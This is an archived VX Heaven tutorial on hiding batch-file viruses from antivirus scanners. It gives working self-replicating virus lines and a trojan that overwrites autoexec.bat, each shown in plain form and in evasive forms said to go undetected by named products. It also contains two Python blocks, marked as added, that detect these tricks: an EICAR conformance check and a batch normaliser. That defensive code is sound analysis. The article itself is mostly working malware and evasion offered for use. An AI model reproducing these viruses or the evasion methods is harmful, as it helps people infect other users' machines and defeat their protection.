
VX Heaven


Anti AV Techniques For Batch

cOrRuPt G3n3t!x
July 2009


To make a batch file virus less conspicuous, harder to read or harder to detect, we use batch "encryption" techniques to fool AVs and anyone trying to read or decipher the code. There are many ways to do this, and today I'll explain every method of batch encryption and AV/heuristic evasion I know. I used ESET NOD32 Anti-Virus for its strong heuristics and Avast4 Professional Edition for plain signature detection. Please remember that all techniques have been tested on Windows Vista and work!

1) EICAR Test File:

AV companies needed a way to test whether their product works on a user's computer without bringing any harm to it, so EICAR was born: a standard 68-byte string that every AV product detects and reports as 'EICAR Test File', 'EICAR-Test-File (not a virus)' or something similar. So we add this string to the beginning of our code in the hope that the user, after seeing that it is a test file and not a virus, lets it run. This only helps when infecting people with limited knowledge of viruses, so it is definitely not a great technique compared to the others. Two things to keep in mind: the EICAR description only covers a file that consists of the string alone (optionally followed by whitespace, 128 bytes at most), so whether a product still reports it when more content follows depends on the engine; and cmd.exe tries to run the string as a command, which fails, before continuing with the rest of the script. Here is the EICAR string, which should be added as the first line of your code:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
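Whether the prefixed string still counts as an EICAR file is the weak point of this trick. The check below is an added example, not code from the article: it applies the EICAR description itself, under which a conformant test file is the 68-byte string alone, optionally followed by whitespace (space, tab, CR, LF, Ctrl-Z), 128 bytes at most. A script that merely starts with the string fails that check, so what a product does with it is up to the product. The sample script is constructed here.

```python
# Added example, not from the article: is a file an EICAR test file as the
# EICAR description defines it? That is the 68-byte string alone, optionally
# followed by whitespace, 128 bytes in total at most. TRAILING is the set of
# whitespace bytes the description allows (space, tab, LF, CR, Ctrl-Z).
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
TRAILING = b" \t\r\n\x1a"


def is_eicar_file(data: bytes) -> bool:
    """True only for a file that conforms to the EICAR description."""
    if len(data) > 128 or not data.startswith(EICAR):
        return False
    return all(b in TRAILING for b in data[len(EICAR):])


def is_eicar_prefixed(data: bytes) -> bool:
    """True when the string merely opens a larger file: the page's trick.
    Such a file is not an EICAR file; any alert for it is engine-specific."""
    return data.startswith(EICAR) and not is_eicar_file(data)


# Constructed sample: the page's trick, EICAR as the first line of a script.
SAMPLE = EICAR + b"\r\n@echo off\r\nfor %%a in (*.bat) do copy %0 %%a\r\n"

if __name__ == "__main__":
    print(is_eicar_file(EICAR), is_eicar_file(SAMPLE), is_eicar_prefixed(SAMPLE))
```

The string alone, or the string plus a trailing newline, passes; the script with the string prepended does not, which is exactly the case the technique relies on.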

2) Fake Bytes:

The scanners used here only looked at roughly the first 1000 bytes of a batch file for malicious code, so what do we do? We fill the first 1000 bytes with a heap of meaningless letters. It is easy, an excellent way past the scanners and in some cases past the heuristics too, though it does nothing against a scanner that reads the whole file. cmd.exe tries to run each padding line as a command, prints a 'not recognized' error and carries on, so the script still works. Here are exactly 1000 bytes of useless text (ten lines of 100 characters) to paste at the beginning of your code:

jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxxbjnkaskjgbuhyhdgddr
djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcbjhnvdjuknvchdhbhvhf
fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfbdbcyufreubfuyhfdbk
fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdrsognfdhjfdyfdhfdhg
fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgkjgufdhgjfugfchghjh
hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgjifugjiuhdruiryhgui
dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfeuygfruyfgybfdbkjkd
dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhnfhngfvjnkfgvlkgfng
fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrhurenyviuntruirtunv
dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgrjkhvsriulkghnkjhgu

3) Standard Encryption Technique (SET):

As the acronym suggests, this technique uses the MS-DOS/cmd 'set' command to "encrypt" the batch file so that it is hard for the AV to analyze and for the user to interpret. Each keyword of the payload is stored in an environment variable with set, and the payload line is written using only variable references; cmd expands the variables when the line executes, so the keywords never appear literally in the file. This may not make sense yet, so see below:

This was detected as 'BAT/Silly.D Virus' by ESET NOD32:

for %%a in (*.bat) do copy %0 %%a

By "encrypting" the keywords for, in, do and copy it becomes undetected. Here it was enough to hide just one of them, but that will not always be the case. This was not detected by ESET NOD32 or Avast4:

set a=for
set b=in
set c=do
set d=copy
%a% %%a %b% (*.bat) %c% %d% %0 %%a

This will be hard for most people to read but not for anyone who knows batch, so what you can do is put the set lines at the bottom of the code and begin the readable part at the top; with a large script the reader has to scroll down to find the decryption. You do this with a GOTO that jumps to the decryption section before returning to the encrypted code. Because cmd expands a variable at the moment the line that uses it executes, the set lines only have to run before the payload, not appear before it in the file. Using more variables makes it harder still to read. See below:

@echo off
GOTO decrypt
:infect
%a% %%a %b% (*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
exit
:decrypt
set a=for
set b=in
set c=do
set d=copy
goto infect

4) Character Overflow:

First off, thanks to DvL for this idea. Character Overflow is just the name I gave to an anti-AV technique that hides your lines so the AV does not pick out the right tokens in your batch. All you do is add a line of filler characters between each line of your code; numbers work as well. I used the character 'n' as it was used in the legendary SASSER worm to cause a buffer overrun. cmd.exe runs each filler line as a command, fails with a 'not recognized' error and moves on, so the script itself is unaffected. The only snag is that the virus needs more than 3 or 4 lines for this to work effectively.

This is a virus by Ratty that was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:

@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls

When using the Character Overflow technique it was not detected by ESET NOD32:

nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo off
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty nul
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst e: a:\ > c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst d: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst c: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty con
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
cls
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn

5) GOTO Confuser:

This one is a bit impractical: it takes a long time and gets confusing depending on the size of your code, and it only works on code longer than 5 lines. It confuses the AV by scattering goto commands so that the lines of the virus are separated from each other and are not read as one contiguous block, so it isn't detected.

This is a virus by Ratty that was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:

@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls

Using the GOTO confuser it was not detected by ESET NOD32:

@echo off
goto a
:f
ctty nul
goto b
:l
@echo subst e: a:\ > c:\autoexec.bat
goto c
:m
@echo subst d: a:\ >> c:\autoexec.bat
goto d
:r
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
rem stop here; otherwise execution falls through into the jump table below and loops forever
exit
:a
goto f
:b
goto l
:c
goto m
:d
goto r

6) Trash Code:

This refers to lines of code that do nothing at all, but as far as the AV is concerned they are working code, so what do we do with that in mind? We put meaningless garbage between the pieces of our actual code. It is important that the variable you use as trash is not used for anything else. Note that 'set trash=' actually clears the variable, so %trash% expands to nothing when the line runs; inside a batch file an unset %variable% expands to nothing anyway, but at an interactive prompt it is left as literal text, so keep the set line if the code is ever pasted into a console:

This was detected as 'BAT/Silly.D Virus' by ESET NOD32:

for %%a in (*.bat) do copy %0 %%a

When using garbage or trash code it was not detected:

set trash=
%trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a

In the first line we made sure trash was set to nothing, then sprinkled it through the virus code; it ran perfectly without being detected!
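Every technique from section 2 to section 6 defeats a scanner that matches the raw bytes of the file; a scanner that first models what cmd.exe executes is much harder to fool. The normaliser below is an added example, not code from the article or from the products it names. It expands %variables% at execution time (sections 3 and 6), drops lines that cannot resolve to a command (the padding of sections 2 and 4), follows goto/label chains (sections 3 and 5) and returns the commands actually run, so the obfuscated samples compare equal to the plain ones. The junk-line rule is a heuristic of this example; the samples are the page's own, except that the GOTO confuser is given an exit after cls so that it does not fall through into its own jump table.

```python
import re

# Added example (not code from the article): a scanner-side normaliser that
# undoes the tricks of sections 2 to 6 by modelling what cmd.exe executes
# rather than matching raw bytes. The samples below are the page's own.
LABEL_RE = re.compile(r"^:([^\s:]+)")
SET_RE = re.compile(r"^set\s+([^=\s/]+)=(.*)$", re.IGNORECASE)
GOTO_RE = re.compile(r"^goto\s+:?(\S+)", re.IGNORECASE)
REM_RE = re.compile(r"^rem(\s|$)", re.IGNORECASE)
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
# Heuristic of this example: a long run of letters/digits with no whitespace
# is not a command cmd.exe could resolve, so it is padding (sections 2, 4).
JUNK_RE = re.compile(r"^[A-Za-z0-9]{16,}$")


def expand(line, env):
    """Expand %name% as a batch file does: an unset name expands to nothing.
    %0 and FOR variables such as %%a never match and are left alone."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), ""), line)


def normalize(script, max_steps=2000):
    """Return the command lines cmd.exe would run, in execution order and
    fully expanded, with set/goto/exit plumbing, labels and padding gone."""
    lines = [l.strip() for l in script.splitlines()]
    labels = {}
    for i, l in enumerate(lines):
        m = LABEL_RE.match(l)
        if m:
            labels.setdefault(m.group(1).lower(), i)  # first occurrence
    env, out, seen, pc, steps = {}, [], set(), 0, 0
    while pc < len(lines) and steps < max_steps:      # cap: goto loops
        steps += 1
        idx, raw = pc, lines[pc]
        pc += 1
        cmd = raw.lstrip("@")                  # "@" only suppresses echo
        if not cmd or cmd.startswith(":") or JUNK_RE.match(cmd):
            continue                           # blank, label/::comment, padding
        if REM_RE.match(cmd):
            continue
        m = SET_RE.match(cmd)
        if m:                                  # plain "set NAME=VALUE"
            env[m.group(1).lower()] = m.group(2)
            continue
        m = GOTO_RE.match(cmd)
        if m:
            target = m.group(1).lower()
            if target == "eof" or target not in labels:
                break                          # goto :eof, or missing label
            pc = labels[target] + 1
            continue
        if cmd.lower().startswith("exit"):
            break
        if idx not in seen:                    # record each line's first run
            seen.add(idx)
            out.append(" ".join(expand(raw, env).split()))
    return out


def same_payload(a, b):
    """True when two scripts execute the same command lines."""
    return normalize(a) == normalize(b)


# --- the page's samples ---------------------------------------------------
SILLY = "for %%a in (*.bat) do copy %0 %%a"
SET_SAMPLE = ("set a=for\nset b=in\nset c=do\nset d=copy\n"
              "%a% %%a %b% (*.bat) %c% %d% %0 %%a")
RATTY = r"""@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls"""
# Character overflow: a junk line before every line of the same script.
OVERFLOW = "\n".join(x for l in RATTY.splitlines() for x in ("n" * 69, l))
# GOTO confuser, with an exit after cls so it cannot loop through the table.
CONFUSER = r"""@echo off
goto a
:f
ctty nul
goto b
:l
@echo subst e: a:\ > c:\autoexec.bat
goto c
:m
@echo subst d: a:\ >> c:\autoexec.bat
goto d
:r
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
exit
:a
goto f
:b
goto l
:c
goto m
:d
goto r"""

if __name__ == "__main__":
    print(normalize(SET_SAMPLE) == [SILLY], same_payload(OVERFLOW, RATTY),
          same_payload(CONFUSER, RATTY))
```

Run stand-alone it prints True three times. The step cap matters: the confuser as printed on the page, without the exit, never terminates in cmd.exe, yet the normaliser still returns each executed line exactly once because it records a source line only on its first execution.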

That's all I have for now. I hope it helps, and be sure to look out for my next tutorial on 'Polymorphism In Batch'. Remember this is for educational purposes only ;). If you'd like to contact me with any queries or problems, please e-mail me at immortalassassin@rocketmail.com.
